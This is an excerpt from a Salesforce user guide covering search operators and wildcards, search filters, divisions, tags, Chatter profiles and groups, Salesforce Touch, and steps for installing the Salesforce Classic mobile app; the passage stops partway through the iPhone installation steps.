Find an exact phrase. Sidebar search automatically places the quotation mark operators around
any search string that you enter. This is the same as selecting Exact phrase in advanced

" " (quotation marks)

search or global search. For example, a search for "monday meeting" finds items that
contain monday meeting, but not items that contain monday afternoon meeting or monday's
meeting. The asterisk (*) and question mark (?) function as wildcards when included in a search
phrase that is enclosed in quotation marks or when Exact phrase is selected in the search
scope.

Search Order

When you combine multiple operators in a search string, they are evaluated in this order:

1. () (parentheses)
2. AND and AND NOT (evaluated from right to left)
3. OR

These examples show how search strings are evaluated:

Finds items with the words...Is the same as...Searching for...

acme and california but not meetingacme AND (california AND NOT
meeting)

acme AND california AND NOT
meeting

acme but not with both california and
meeting

acme AND NOT (california AND
meeting)

acme AND NOT california AND
meeting

acme and california and items with the
word meeting

(acme AND california) OR
meeting

acme AND california OR
meeting

acme and california and items with the
words acme and meeting

acme AND (california OR
meeting)

acme AND (california OR
meeting)

Refining Search Using Wildcards
Available in: All Editions except Database.com

Wildcards

DescriptionWildcard

Asterisks match zero or more characters at the middle or end (not the beginning) of your
search term. For example, a search for john* finds items that start with john, such as, john,

* (asterisk)

johnson, or johnny. A search for mi* meyers finds items with mike meyers or michael meyers.
If you're using sidebar search, an * is automatically appended to the end of the search string.
You can use an * at the beginning of a search term in a standard lookup search.
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DescriptionWildcard

Question marks match only one character in the middle or end (not the beginning) of your
search term. For example, a search for jo?n finds items with the term john or joan but not

? (question mark)

jon or johan. If you're using global search, the ? is removed from the end of your search term
and isn't treated as a wildcard. You can't use a ? in a lookup search.

Wildcard Behavior and Limitations

• Wildcards take on the type of the preceding character. For example, aa*a matches aaaa and aabcda, but not aa2a or aa.!//a,
and p?n matches pin and pan, but not p1n or p!n. Likewise, 1?3 matches 123 and 143, but not 1a3 or 1b3.

• You can't search for a ? or * in a search phrase that is enclosed in quotation marks or when Exact phrase is selected in the
search scope because they function as wildcards. For example, "my wo?d" matches my wood and my word.

• A wildcard (*) is appended at the end of single characters in Chinese, Japanese, Korean, and Thai (CJKT) searches, except
in exact phrase searches.

• If you're entering search terms in global search, the search box drop-down list gives you the option to search for your term
with an * added to the end. For example, type jo in the search box, then select Search for jo* (starts with) to find joan,
john, johnson, and other matches that start with jo.

Refining Search
Available in: All Editions except Database.com

Improve your search results by:

• Changing search options

◊ Sidebar search

◊ Advanced search

◊ Global search

• Using feed search, if you’re trying to find information in a specific feed

• Using wildcards

• Using operators, if you're using advanced search, global search, or feed search

Customizing Search Results Columns
Available in: All Editions except Database.com

For most objects, you can specify the enhanced lookup and search results columns and column order.

1. In the object's search results related list, click My Columns (Administrators click Customize... > My Columns).
2. To choose columns, use Add and Remove.

Your administrator determines the available columns in a search layout. If search layouts aren't available for the object,
such as articles, dashboards, reports, and tags, you can't customize the columns.
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3. To reorder columns, use Up and Down.
4. Click Save.
5. Click column headings to sort the results in ascending or descending order.

Sorting applies across all search results for a particular object, including those on subsequent pages. You can’t click on
column headings for multi-select picklist fields because you can’t sort the multi-select picklist field type.

Filtering Search Results
Available in: All Editions except Database.com

To restrict search or enhanced lookups results for objects, you can use filters. Your administrator determines the available filter
fields in a search layout. If your administrator didn't create a search layout for the object or if search layouts aren't available
for the object, such as articles, dashboards, reports, and tags, you can't filter your results.

Filters aren't available in Customer Portals or partner portals.

Filtering Search Results for Most Objects

1. Click Show Filters in a search results related list.
2. Enter filter criteria using the following tips and click Apply Filters.

• When filtering search results, the operator is selected automatically based on the field type. The = (equals) operator
is used for fields with the following types of fields:

◊ Dates
◊ Numbers, except auto number or phone fields
◊ Record IDs

All other fields use the contains operator. Auto number and phone fields use the contains operator because they
can contain non-numeric characters.

• Except for number fields, commas are used as OR operators in search results filters. For example, if you enter
acme, california in the Account Name filter field, your results include account names with either acme
or california. For number fields (where a comma can be part of a number) commas aren't treated as OR operators
and users must explicitly enter the OR operator.

Note:  Explicitly using the OR operator is only supported in number fields.

• The criteria you specify are AND based. That is, if you specify more than one criterion, the result includes only
records that match all of the criteria. For example, if you enter acme california in the Account Name
filter field, your results include account names with both acme and california.

• Any field of type URL is filtered based on the exact value that is entered by the user for that field.

Tip:  We recommend that you don't include http:// or https:// in URL filter criteria because you
may not get the results that you expect.

When you enter values in URL fields and save records, Salesforce adds http:// to any URL that doesn’t
start with http:// or https://. The added http:// isn't stored in the database. For example, if

132

Filtering Search ResultsRefine Search Results



you enter salesforce.com in the Website field and save the record, the Website field displays
http://salesforce.com, but the value stored is salesforce.com. Therefore, if you enter
http://salesforce.com in the Website filter field, your results don't include your record.

• You can enter literal date values such as YESTERDAY or NEXT MONTH.
• If you perform a blank lookup—that is, you click the lookup icon without entering a search term—filters only

apply to items in the most recently used list. Otherwise, filters apply to both this list and the resulting records of
the lookup.

Clearing and Hiding Filters

Click Clear Filters to remove all filters and see unfiltered search results. Click Hide Filters to apply the filters but not
display them on the page.

Filtering Search Results for Articles, Files, Products, and Solutions

To filter the results for articles, files, and products, and to further filter the results for solutions, click the link in the
appropriate results related list. Your search and results automatically appear on the new page. If you filter the solutions
results on the Search Results page and then use the link in the appropriate results related list to further filter your results,
your filter options aren't applied on the new page.

Using Divisions in Search and List Views
If your organization uses divisions to segment data, you can search and create list views by division.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Affected by Divisions”To search within divisions:

Searches

• To search within a division in a lookup dialog, select a division from the drop-down list in the lookup dialog window.
Search results will contain records in the selected division.

• To search all records within the current user-selected division, use global search.
• To search within multiple divisions at the same time, use advanced search.

List Views

• To change results displayed in a custom list view, set the Division Name when creating or editing a list view. The current
user-level selectable division will not change which results are displayed in your custom list view.

• To find records in a specific division in a list view that does not have the Division Name set, change your user-level selectable
division.
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• To view records across all divisions, change your user-level selectable division to “—All—” or when creating a custom list
view, set Division Name to “—All—”.

See Also:
Divisions Overview
Changing Your Working Division
Reporting With Divisions

TAGS

Tags Overview
Available in: All Editions except Database.com

Tags are words or short phrases that you can associate with most Salesforce records to describe and organize their data in a
personalized way. Use tags to group records from various objects by a common theme or use, and then use those tags in search
to make finding information fast and intuitive.

For example, if you met a number of contacts and leads at a conference, you might tag them all with the phrase User Conference
2011. You could then search for the User Conference 2011 tag and click that tag in search results to retrieve those records.

Salesforce supports two types of tags.

• Personal tags are private. Only you can view any personal tags that you add to a record.

• Public tags are shared among all users in an organization. Any user with access to the record can view the public tags that
you add.

Administrators can enable personal and public tags for accounts, activities, assets, campaigns, cases, contacts, contracts,
dashboards, documents, events, leads, notes, opportunities, reports, solutions, tasks, and any custom objects (except relationship
group members), allowing you to:

• Tag records

• Remove tags from a record

• Browse, search, and manage tags
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Tagging Records
Available in: All Editions except Database.com

User Permissions Needed

“Read” on the recordTo edit tags on a record:

“Tag Manager”To rename or delete public tags:

1. On the top right corner of the record detail page, click Add Tags. If the record already has associated tags, click Edit Tags.
2. In the Personal Tags or Public Tags text boxes, enter comma-separated lists of the tags that you want to associate

with the record. Tags can only contain letters, numbers, spaces, dashes, and underscores, and must contain at least one
letter or number.

As you enter new tags, up to 10 tags that have already been defined are displayed as auto-complete suggestions. As you
type, the list of suggestions changes to show only those tags that match the prefix you have entered. To choose a suggestion,
click it or use your keyboard arrow keys to select it and press the TAB or ENTER key.

3. Click Save.

Tip:  When you create or edit tags, you can press the ENTER key to save your changes or the ESC key to discard
them.

Note:  There are limits on the number of personal and public tags you can create and apply to records. For all editions,
if you attempt to tag a record with a new tag that exceeds one or more of these limits, the tag isn't saved. If you reach
a limit, you can go to the Tags page and delete infrequently used tags.

See Also:
Tags Overview
Removing Tags from Records

Removing Tags from Records
Available in: All Editions except Database.com

User Permissions Needed

“Read” on the recordTo edit tags on a record:

1. On the top right corner of the record detail page, click Edit Tags.
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2. Next to the Personal Tags or Public Tags text boxes, click [X] next to the tag that you want to remove.
3. Click Save.

Tip:  When you create or edit tags, you can press the ENTER key to save your changes or the ESC key to discard
them.

If the tag that you removed is the last instance of the tag, the tag is deleted from your organization completely. If other records
use the tag, the tag still appears in search results and the Tags page.

Browsing, Searching, and Managing Tags
Available in: All Editions except Database.com

User Permissions Needed

“Tag Manager”To rename or delete public tags:

To access the Tags page, click the name of any tag on a detail page, or if your administrator added tags to the sidebar, click
Tags in the sidebar.

From this page, you can:

• View and browse tags

• Find records with tags

• Search tags

• Rename and delete tags

• Review personal tag statistics

Viewing and Browsing Tags

Use the Personal Tags and Public Tags checkboxes to limit or expand your view. Because personal tags are private, you
can only see the personal tags that you have defined. You can see all public tags that are defined in your organization.

Click a letter at the top of the tag browsing area to view only tags that begin with that letter or click Next Page or Previous
Page.

By default, tags are listed in alphabetical order. From the Sort picklist, choose By Number of Uses to sort tags by the number
of records that are tagged by them, or choose By Most Recently Used to sort tags by how recently they were added to a record.

Finding Records with Tags

Click a tag to see the list of records organized by object. The number of records associated with the tag is displayed next to
the tag. You can narrow your results further by clicking additional tags. When more than one tag is selected, only records that
match all selected tags are displayed in the list of results. Click [X] next to a tag to deselect it and remove it from the filter.
Click Clear Selected Tag(s) to deselect all tags and start over.
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Note:

• The number of records associated with a tag can sometimes be greater than the number of records displayed when
you click that tag in the Tags page. This situation occurs if you tagged a record and then lost permission to view
it because of a change in sharing, or if a record that you don't have access to has one or more public tags.

• Search results and the Tags page don't display custom objects that don't have an associated tab, even if tags are
enabled for the custom object.

You can customize columns and filter the search results. See Search Results.

Searching Tags

Enter terms in the Search Tags text box and click Search. Only tags that meet your search criteria are listed in the tag browsing
area. You can then click any tag to view records associated with that tag.

Search strings must include at least two characters and can include wildcards and operators.

The most recent search result is saved in the tag browsing area next to the alphabet at the top of the page. Click the search
string to return to your results.

Renaming and Deleting Tags

• To rename a tag, hover over the tag and select Rename from the drop-down list that appears around the tag. Enter a new
name for the tag in the text box that appears and click Save.

• To delete a tag, hover over the tag and select Delete from the drop-down list that appears around the tag. The tag is
removed from every record in your organization and is placed in the Recycle Bin.

If you restore a tag from the Recycle Bin, it is automatically reassociated with the records from which it was removed. For
more information, see Using the Recycle Bin on page 119.

You can rename or delete any personal tag, but you must have the “Tag Manager” permission to rename or delete a public
tag.

Reviewing Personal Tag Statistics

Click Personal Tag Usage on the right side. This page displays your current number of unique personal tags and personal tag
applications. You can have a maximum of:

• 500 unique personal tags
• 5,000 instances of personal tags applied to records

If you are approaching your personal tag limits, consider merging similar tags into a single tag by renaming. For example, if
you have tags for Bicycling, Cycling, and Biking, you can rename Cycling and Biking to Bicycling to reduce your number of
unique personal tags.

To reduce the number of instances of tags applied to records, delete personal tags that you no longer use.

Viewing Recently Used Tags
The Tags link and Recent Tags drop-down list, available in the sidebar, allow you to browse tags and access your most recently
used tags, respectively.

• Click Tags to browse, search, and manage your entire tag collection.
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• Select a tag in the Recent Tags drop-down list to view all records that have been marked with that tag. The tags that appear
in this list are those you have most recently used to tag records.

SEARCH FAQ

Why does the same search by different users return
different results?

The reason two users may not have the same results for the same search is because each search is configured for the specific
user. For example, if a user has recently viewed a record, that past viewing increases the relevancy of that record and moves it
higher in the list of search results. Records also become more relevant if they are owned by the user performing the search, or
if they are used frequently by other members of the organization.

COLLABORATE WITHIN SALESFORCE

Editing Chatter Contact Information
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Your contact information is visible to all users in your Chatter organization. You can change this information at any time by
viewing your profile on the Profile tab or by clicking Your Name > My Profile at the top of any page. Click  in the Contact
or About Me sections to edit your contact information.

If your organization has enabled Communities, you can control the visibility of your contact information within communities
on a field-by-field basis. In the global header, click Your Name > Edit Contact Info to edit your contact information and
visibility settings.

You can change the following fields (in alphabetical order):

DescriptionField

City portion of user’s address. Up to 40 characters are allowed in this field.City

Country portion of user’s address. Up to 80 characters are allowed in this field.Country

Email address of user. Must be a valid email address in the form: jsmith@acme.com.
Up to 80 characters are allowed in this field.

Email

Fax number for user.Fax

First name of user, as displayed on the user edit page. Up to 40 characters are allowed
in this field.

First Name
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DescriptionField

Last name of user, as displayed on the user edit page. Up to 80 characters are allowed
inthis field.

Last Name

Indicates the user's manager. This field can only be set by an administrator.Manager

Cellular or mobile phone number. Up to 40 characters are allowed in this field.Mobile Phone

State or province portion of user’s address. Up to 80 characters are allowed in this field.State/Province

Street address for user. Up to 255 characters are allowed in this field.Street Address

Job title of user. Up to 80 characters are allowed in this field.Title

The user's work phone number. Up to 80 characters are allowed in this field.Work Phone

Zip code or postal code portion of user’s address. Up to 20 characters are allowed in this
field.

Zip/Postal Code

See Also:
Uploading Chatter Group and Profile Photos

Uploading Chatter Group and Profile Photos
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Upload a photo to your profile so people can see who you are, or upload a photo for Chatter groups that you own or manage.

1. View your profile or a group:

• View your profile by clicking Your Name > My Profile at the top of any page or by clicking the Profile tab.
• View a group by clicking a group name in a feed, on the Groups tab, or in the Groups list on someone's profile.

2. Hover over the stock photo and click Add Photo, or if you previously added a photo, click Update.
3. Click Browse....
4. Select a file to upload and click Open.

Note:  Photos can be .jpg, .gif, or .png format up to 8 MB.

5. Drag the dotted lines in the photo to create a thumbnail image that displays next to your name or the group’s name around
the application.

6. If the photo is for your profile and you’re a member of any communities, you can select Show in communities with
publicly accessible pages. This makes the photo visible to guest users viewing publicly accessible sites or pages
that don’t require login.

7. Click Save.
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To delete a photo, hover over the photo and click Delete, then click OK.

Following People
Follow people to see updates in your Chatter feed, including posts, comments, and likes.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Note:  When your administrator turns on Chatter, you automatically follow some users and records in your organization.

Click Follow to follow a person wherever you see the person’s name in Chatter, for example on the:

• Person’s profile page

• People list view

• Person’s hover

• Recommendations list

• Followers and Following lists

Once you follow people, you see their posts, comments, and likes in your Chatter feed. You can follow a maximum of 500
people and records.

To stop following a person, hover over the person’s name and click  next to Following. When you stop following a person,
you don’t see future updates from that person in your Chatter feed.

See Also:
Following Records

Following Records
Follow records so you can see updates in your Chatter feed, including field changes, posts, tasks, and comments on records.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Read” on the recordTo view a record:

The field changes you see in your feed are determined by the fields your administrator configured for feed tracking. Updates
to encrypted custom fields don't display in feeds.

Note:  When your administrator turns on Chatter, you automatically follow some users and records in your organization.
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Click Follow on a

• Record detail page, in the record feed above the Followers list

• Salesforce Knowledge article, next to the record

• Person’s Following list, next to the record

When you follow a record, you see updates to the record in your Chatter feed.

To stop following a record, click  on the record detail page or on the record’s hover. After you stop following a record, you
don’t see future updates to the record in your Chatter feed.

Consider these tips when following records in Chatter:

• You don’t automatically follow records you create. To automatically follow records you create, from your Chatter settings,
click My Feeds and select Automatically follow records I create. However, you don't auto-follow events, tasks, or
dashboards in Chatter after you create them.

• When you create person accounts, you can only auto-follow the account fields, not the contact fields.
• You can follow a maximum of 500 people and records.

See Also:
Following People

Joining or Leaving Chatter Groups
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

To join a Chatter group:

• For public groups, click Join on a group detail page, in the Groups list on the Chatter tab, or on a group hover.
• For private groups, click Ask to Join on a group detail page, in the Groups list on the Chatter tab, or on a group hover.

An email is sent to the group’s owner and managers, who can accept or decline your request. Users with the “Modify All
Data” permission can directly join private groups, and therefore see Join for private groups.

You can join up to 100 groups. Requests to join private groups count toward this limit. For example, if you're a member of
90 groups, you can only request to join 10 more groups.

To leave a public or private Chatter group, go to the Groups list on the Chatter tab or a group detail page and click . Clicking
 also withdraws a request to join a private group.

Searching in Chatter
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Watch a Demo: Using Smart Search (2:12 minutes)

To find feeds, people, groups, topics, and files across Chatter:
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1. Enter your search terms in the header search box.
2. Click Search.
3. From the search results, click an item to open it or click Edit, if available.

Click Search Feeds at the top of the page to view Chatter feed search results that include your search terms. Click Records
to return to Chatter people, groups, topics, and files search results.

You can also fine tune your feed searches in the following ways:

•
Search the posts and comments in a specific group, profile, record, or other Chatter feeds by using the feed search ( )
in that context.

• Search for hashtag topics by entering # followed by the topic (such as #SalesReport) in the header search box. Search
results return feed items that contain your search terms. To search for hashtag topics with multiple words, use brackets
after the hashtag and around the words. For example, to find all instances of #Universal Paper, type #[universal
paper] in the search box.

• Search for mentions by entering @ followed by a person’s name (such as @Madison Rigsby) in the header search box.
In the search results, click Search Feeds to see where Madison Rigsby is mentioned in Chatter posts and comments.

USE SALESFORCE ON MOBILE DEVICES

GET STARTED WITH SALESFORCE TOUCH

Salesforce Touch Overview

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions.

Salesforce Platform licenses are also supported.

Salesforce Touch is a version of Salesforce that’s designed specifically for touchscreen mobile devices. Using Salesforce Touch,
you have real-time access to the same information that you see in the office, but organized for working while on the go.

Salesforce Touch provides these benefits over using the full Salesforce site on your mobile device:

• An intuitive interface that is optimized for easy navigation and data interaction on a touchscreen, so you can scroll, tap,
and swipe through records to quickly find the information you need

• Automatic updates and enhancements, so you’re always using the most current version

• Support for many of your organization’s Salesforce customizations

There are several versions of Salesforce Touch.

• A downloadable app that’s available from the Apple® App Store or AppExchange Mobile and installs directly on touchscreen
mobile devices. In this release, the downloadable app is available for Apple iPad® and iPhone® devices.
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• A mobile browser app that runs in the Safari® web browser on iPad and iPhone devices.

The downloadable app offers the convenience and time savings of maintaining your Salesforce session, so you don’t need to
log in every time you access Salesforce Touch. Use the mobile browser version if you don’t want to bother with installing an
app on your device.

Note:

This release of Salesforce Touch doesn’t have all of the functionality of the full Salesforce site. See Available Data in
Salesforce Touch.

Requirements for Using Salesforce Touch

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions.

Salesforce Platform licenses are also supported.

These are the requirements for using the downloadable and mobile browser versions of Salesforce Touch.

App Version:

Only v1.1 or later downloadable apps are supported.

No version restrictions exist for the mobile browser app.

Devices:

Apple iPad® 2 and later models (including the iPad mini), with iOS® 6 or later.

Apple iPhone® 4 and later models, with iOS 6 or later.

Browsers:

The default Apple browser, Safari®.

Private Browsing must be turned off. Tap the iPad or iPhone Settings icon, then select Safari and set Private
Browsing to Off.

Salesforce:

Salesforce Touch is available in Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions.
Salesforce Platform licenses are also supported.

You must have an active Salesforce account with access to accounts and contacts.

Chatter customers and partner portal users aren’t able to use Salesforce Touch.

Wireless Connection:

A Wi-Fi® or cellular network connection is required to communicate with Salesforce. For the best performance, we
recommend using Wi-Fi. If you use Salesforce Touch on a 3G cellular network, data rates may apply and you may incur
roaming charges while traveling.

Salesforce Touch includes offline support, so you can view recently accessed records when you don’t have a connection.
This feature is available through a pilot program—contact salesforce.com to have it enabled.
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Locales and Languages:

Salesforce Touch works with almost all Salesforce-supported locales and the fully-supported and end user languages.
The exception is right-to-left locales and languages (including Arabic and Hebrew), which aren’t currently supported.

Advanced currency management isn’t supported in this release.

See Also:
Salesforce Mobile Products Overview
Salesforce Touch Overview

Available Data in Salesforce Touch

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions.

Salesforce Platform licenses are also supported.

Salesforce Touch doesn’t have all of the functionality of the full Salesforce site. You can access all of your standard and custom
apps. Not all of the standard Salesforce objects, however, are supported in this release. You can work with these tabs in both
the mobile browser and downloadable versions of Salesforce Touch:

• Accounts and Person Accounts

• Campaigns

• Cases

• Contacts

• Contracts

• Dashboards

• Leads

• Live Chat Transcripts

• Opportunities

• Tasks

• All custom tabs

Additionally, you can:

• View events that are accessible from Open Activities or Activity History related lists

• Monitor Twitter profiles that you’ve associated with your contact records

• See many of the related lists for supported objects

• View User record details

• Access your Chatter data, including people, groups, and feeds

• Access Salesforce Communities (from the My Salesforce pane in the navigation view)

With some exceptions, all of the standard and custom fields for supported objects are available.

The Salesforce Touch interface includes links to the full site, where you can do tasks not currently available in Salesforce
Touch. These links are provided as a convenience but using the full site from Salesforce Touch isn’t officially supported.
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Accessing Salesforce Touch

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions.

Salesforce Platform licenses are also supported.

The way you access Salesforce Touch depends on the version that you want to use: the downloadable app or the mobile browser
app.

Note:  Contact your Salesforce administrator to see which versions of Salesforce Touch are available for your
organization. By default, the downloadable app is the only version that’s automatically enabled but your administrator
may have modified access so that the mobile browser app is turned on instead of—or in addition to—the downloadable
app.

Accessing the Downloadable App

Currently, the Salesforce Touch downloadable app is available for iPad and iPhone devices. You can download and install the
app from the Apple App Store or AppExchange Mobile.

Once the app is installed, launch it from your Home screen and log in to your Salesforce account. By default, you’re connected
to your production environment.

Note:

If you have trouble logging in to Salesforce from the downloadable app, contact your administrator to see if the app
is disabled for your organization.

Using the downloadable app, your Salesforce Touch session persists until you specifically log out, so you won’t be prompted
to sign in again after periods of inactivity. The downloadable app also saves you time by remembering what you were working
on, so you can switch away to do other tasks then pick up exactly where you left off whenever you’re ready.

Accessing the Mobile Browser App

The Salesforce Touch mobile browser app is available for iPad and iPhone devices. If the mobile browser version of Salesforce
Touch is enabled for your organization, you’re automatically redirected to Salesforce Touch when you log in to Salesforce
from your Safari mobile web browser.

If Salesforce Touch doesn’t automatically start for you, make sure that you didn’t turn off the redirection to the mobile browser
app. See Turning the Salesforce Touch Mobile Browser App Off or On on page 146 for more information.

See Also:
Salesforce Mobile Products Overview
Salesforce Touch Overview
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Using Salesforce Touch

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions.

Salesforce Platform licenses are also supported.

To learn about using Salesforce Touch, see the Salesforce Touch FAQ that’s available in the app, on the My Salesforce pane in
the navigation view.

See Also:
Salesforce Mobile Products Overview
Salesforce Touch Overview

Turning the Salesforce Touch Mobile Browser App Off or
On

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions.

Salesforce Platform licenses are also supported.

If you prefer to access the full Salesforce site from the Safari browser on your iPad or iPhone device, you can turn off automatic
redirection to the Salesforce Touch mobile browser app—either from your mobile device or from the full site. You can quickly
re-enable the mobile browser app anytime from the full site.

Note:

If you disable automatic redirection to Salesforce Touch, you can’t access the mobile browser app from any of your
mobile devices. For example, if you turn off the mobile browser app from your iPad, you won’t be able to use the
mobile browser app on your iPhone either (assuming Salesforce Touch for touchscreen phones is enabled for your
organization).

These steps don’t affect the Salesforce Touch downloadable app, which always displays the Salesforce Touch interface.

To turn off the mobile browser app from your iPad:

1. Log in to Salesforce Touch from Safari.

2. Tap the Navigation  icon in the toolbar.
3. Traverse the navigation view to the My Salesforce pane.

• In landscape orientation, if the navigation and detail views display side-by-side, tap  on the tab pane.

• In other cases, tap  on the list pane then tap  on the tab pane.

4. In the Settings menu, tap Turn off Touch.

To turn off the mobile browser app from your iPhone:
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1. Log in to Salesforce Touch from Safari.

2. Tap the Navigation  icon in the list pane toolbar to open the tab pane.

3. Tap  on the tab pane to view the My Salesforce pane.
4. In the Settings menu, tap Turn off Touch.

To turn off the mobile browser app from the full Salesforce site:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information.
• If you clicked My Settings, select Personal > Advanced User Details.

3. Click Edit.
4. Deselect Touch User.
5. Click Save.

If you change your mind later, you can turn the Salesforce Touch mobile browser app back on. From the full site, repeat the
previous steps and select the Touch User checkbox.

See Also:
Salesforce Mobile Products Overview
Salesforce Touch Overview

GET STARTED WITH SALESFORCE CLASSIC

Salesforce Classic Overview
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

The Salesforce Classic app provides mobile access to your Salesforce data from Android™, BlackBerry® and iPhone® devices.
If you have a license to use the full version of Salesforce Classic, you can view, create, edit, and delete records, keep track of
your activities, view your dashboards, run simple reports, and log calls and emails. Any Salesforce user who doesn't have a
mobile license can download a free, restricted version of Salesforce Classic. With the free version, you can view, create, edit,
and delete only accounts, assets, contacts, leads, opportunities, events, tasks, cases, and solutions. You can also access your
dashboards.

Note:  Supported features may vary depending on your mobile operating system and device model.
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Salesforce Classic stores your Salesforce records in a local database on your mobile device, which means you can use the
Salesforce Classic app even when a data connection is unavailable. Salesforce Classic periodically polls Salesforce for new and
updated records, saving you from the hassle of manually synchronizing your data.

In the free version of Salesforce Classic, only records you recently accessed in Salesforce automatically synchronize to your
device. However, you can search for and download records that are not automatically delivered to your device. Items you
download from Salesforce become a permanent part of your mobile data set. In addition to recently accessed records, the
default configuration synchronizes activities closed in the past five days and open activities due in the next 30 days.

Check the list of supported mobile devices to see if you can use the Salesforce Classic app on your smartphone.

See Also:
Salesforce Classic Implementation Guide
Salesforce Classic User Guide for BlackBerry
Salesforce Classic User Guide for iPhone

Requirements for Using Salesforce Classic
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

The Salesforce Classic app can run on Android, BlackBerry, and iOS operating systems, and it's supported by virtually all
wireless carriers—if the device can establish a data connection to the Internet, it can typically run the mobile app. Verify that
your device is supported before installing the mobile app. Recently-released mobile devices may not be immediately supported
because every device goes through the official certification and quality assurance process.

Notes About BlackBerry Smartphones

• Even if your device meets the minimum operating system requirement, you can improve its performance by upgrading to
the latest supported version of the operating system offered by your mobile carrier.

• Mobile users running versions 4.0 - 4.3 of the BlackBerry operating system can still download and install the Salesforce
Classic app; however, the mobile server will detect the older operating system and send version 11.6 of Salesforce Classic,
which was the last release that supported BlackBerry operating system versions 4.0 - 4.3. Users on version 11.6 of Salesforce
Classic can't use any of the new features included in the current release or future releases.

• Starting in Winter '09, Salesforce Classic no longer officially supports the BlackBerry 8700 series, although the mobile
app may continue to run on those device models.

• BlackBerry touchscreen devices use the same Salesforce Classic app as other BlackBerry devices, so some aspects of Salesforce
Classic aren’t optimized for the touchscreen interface.

Notes About iOS Devices

Use of the Salesforce Classic app for Apple products is subject to certain limitations:

• Third parties (including, but not limited to, Apple Inc. and your network connectivity provider) may at any time restrict,
interrupt or prevent use of Salesforce Classic for the iPhone and iPod touch devices, or delete the Salesforce Classic app
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from iPhone or iPod touch devices, or require salesforce.com to do any of the foregoing, without entitling the customer
to any refund, credit or other compensation from such third party or salesforce.com.

• Service level agreements don’t apply to the Salesforce Classic for iPhone product. Additional limitations are described in
the Order Form Supplement for Salesforce Classic for iPhone, which users are required to accept upon download or
installation of the Salesforce Classic for iPhone product.

See Also:
Salesforce Mobile Products Overview
Salesforce Classic Overview

Installing the Salesforce Classic App
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

You can install the Salesforce Classic app on any supported Android, BlackBerry, or iPhone device.

The easiest way to install Salesforce Classic is to visit http://mobile.salesforce.com from your mobile device and
follow the on-screen instructions.

Or, you can use the installation steps for your type of device:

Android Installation

Salesforce Classic is available for download from Google Play. To access Google Play, your Android device must be connected
to the network. You also need a Google account to download applications. If you don't already have a Google account, go to
https://accounts.google.com and select Sign up to set one up.

To install Salesforce Classic from Google Play:

1. From the Apps screen of your Android device, select the Google Play Store.
2. Select the Search field, and type salesforce.
3. Select Salesforce Classic from the search results.
4. Select Download.
5. Tap Accept and Download if you agree to the terms.
6. Select Open to launch the application.
7. The first time you launch the Salesforce Classic app on your device, you must activate the app for your device by logging

in and downloading data. Verify that your phone is connected to a network.

a. Select I Accept.
b. On the activation screen, enter your Salesforce username and password.
c. Select Activate.

Depending on your organization's setup, you might need to set up a passcode before accessing the app.

149

Installing the Salesforce Classic AppGet Started With Salesforce Classic

http://www.salesforce.com/mobile/apps/download/devicesupport.jsp
https://accounts.google.com


BlackBerry Installation

Salesforce Classic is available for download from BlackBerry World. You need a BlackBerry World account to download apps
on your BlackBerry, but you can create an account from your device if you don't already have one. To install Salesforce Classic
from BlackBerry World:

1. Select the BlackBerry World icon.

If you can’t find the icon on your device, you might need to download BlackBerry World. BlackBerry World can't run on
all BlackBerry smartphones, so be sure to review Research in Motion's system requirements before trying to install BlackBerry
World on your device.

2. Select the Search icon.
3. Enter salesforce in the Search field.
4. In the search results, select Salesforce Classic.
5. Click Download.
6. After the installation completes, select OK.
7. When prompted whether to permit the app to access the phone, select Allow.
8. When prompted whether to permit the app to access tp.mobile.salesforce.com, select Yes.
9. Close BlackBerry World.
10. Select the app icon, which resides on the home page of your device or in the Applications folder. On newer phones, the

icon may be in the Downloads folder.
11. The first time you launch the Salesforce Classic app on your device, you must activate the app for your device by logging

in and downloading data. Verify that your device is connected to a network.

a. Read the license agreement and select I Accept.
b. Enter your Salesforce username and password.

Because many passwords contain special characters that are difficult to enter on the device, the Show Password
checkbox is selected by default. To protect your password, you can deselect the option.

c. Select Activate.

After your username and password are confirmed by Salesforce, the data downloads. The initial data download may
last a few minutes. Future updates to the data occur automatically.

Depending on your organization's setup, you might need to set up a passcode before accessing the app.

Note:

If you’re unable to download the Salesforce Classic app from BlackBerry World, you can install the app over-the-air
directly from salesforce.com instead.

iPhone Installation

Salesforce Classic is available for download from Apple's App Store. To use the App Store, your iPhone or iPod touch must
be connected to the network. You also need an iTunes™ Store account to download applications. If you don't already have an
iTunes Store account, open iTunes on your computer and select Store > Account to set one up.

To install Salesforce Classic from the App Store:

1. From the Home screen of your iPhone or iPod touch, select the App Store icon.
2. Tap Search.
3. Tap within the Search field to open the keyboard. Type salesforce.
4. Select Salesforce Classic in the list of search results to view information about the application.
5. Tap Free, and then tap Install.
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Note:  There’s no charge to download the app from the App Store. Enterprise, Professional, Unlimited, and
Developer Edition users with mobile licenses run the full version of Salesforce Classic. Any Salesforce user who
doesn't have a mobile license can download a free, restricted version of Salesforce Classic.

6. Enter your iTunes Store account and password and tap OK.
7. The first time you launch Salesforce Classic, you must activate the app for your device by logging in and downloading data.

Verify that your device is connected to a network.

a. Tap the Salesforce icon on the Home screen.
b. Tap I Accept.
